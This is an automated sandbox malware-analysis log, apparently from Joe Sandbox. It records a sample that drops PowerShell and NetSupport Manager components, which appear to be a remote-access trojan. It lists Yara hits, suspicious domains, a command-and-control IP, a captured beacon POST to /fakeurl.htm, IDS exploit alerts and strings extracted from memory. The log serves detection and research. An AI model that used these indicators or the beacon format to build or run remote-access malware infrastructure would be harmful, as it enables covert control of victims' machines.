Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Advanced IP Scanner\unins000.dat, type: DROPPED
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache (identical request observed 3 times)
Source: Joe Sandbox View | IP Address: 151.236.16.15
Source: Joe Sandbox View | IP Address: 104.26.0.231
Source: Joe Sandbox View | IP Address: 199.188.200.195
Source: Joe Sandbox View | ASN Name: HVC-ASUS
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49744
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49733
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (observed 2 times)
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficDNS traffic detected: DNS query: payiki.com
                                  Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                  Source: global trafficDNS traffic detected: DNS query: anyhowdo.com
                                  Source: unknownHTTP traffic detected: POST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:02:25 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df7795488750c13-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:02:25 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df7795488750c13-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:02:25 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df7795488750c13-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:02:25 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df7795488750c13-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:02:27 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df7795fce8b1440-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pQjO%2B41IdUtx%2FJmGyD87oAf6VQPsI1Chxse26dpberDEWTV%2FWp0MpdaxbscXKb1WGKQpzdrNsKelEeTwlExkgdzda5JgF2CrvwH0AN%2F7eje7NBY2aeMPN5e%2Fhgew8yebCx%2FRiGxCS1wYq1N7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1054&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:02:28 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df77965ffcc4751-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U4knnFWNE1BF9p27ArHB4yz%2FHT3QSRWU4CBsaxuAejnAP2XeAYI%2BhoGOLcuuG7PI4Ie1IpAtLJrap97WMEhm15TBDCAll7SAFt4XMFb8f63oKwgkRK67MnnOtET1aGOwhuEDZWAE0ZOUthX6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1201&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                  Source: client32.exe, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/fakeurl.htm
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/testpage.htm
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll
                                  Source: client32.exe, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://127.0.0.1
                                  Source: client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                                  Source: client32.exe, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                  Source: client32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp%f
                                  Source: client32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp3f
                                  Source: client32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspEg
                                  Source: client32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspFz
                                  Source: client32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspNx
                                  Source: client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                  Source: client32.exe, 00000007.00000002.4095147957.000000000082A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspu
                                  Source: powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://qt-project.org/xml/features/report-start-end-entity
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://qt-project.org/xml/features/report-whitespace-only-CharData
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://s.symcd.com06
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://s.symcd.com0_
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://s2.symcb.com0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                  Source: powershell.exe, 00000003.00000002.1912534174.00000000045D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
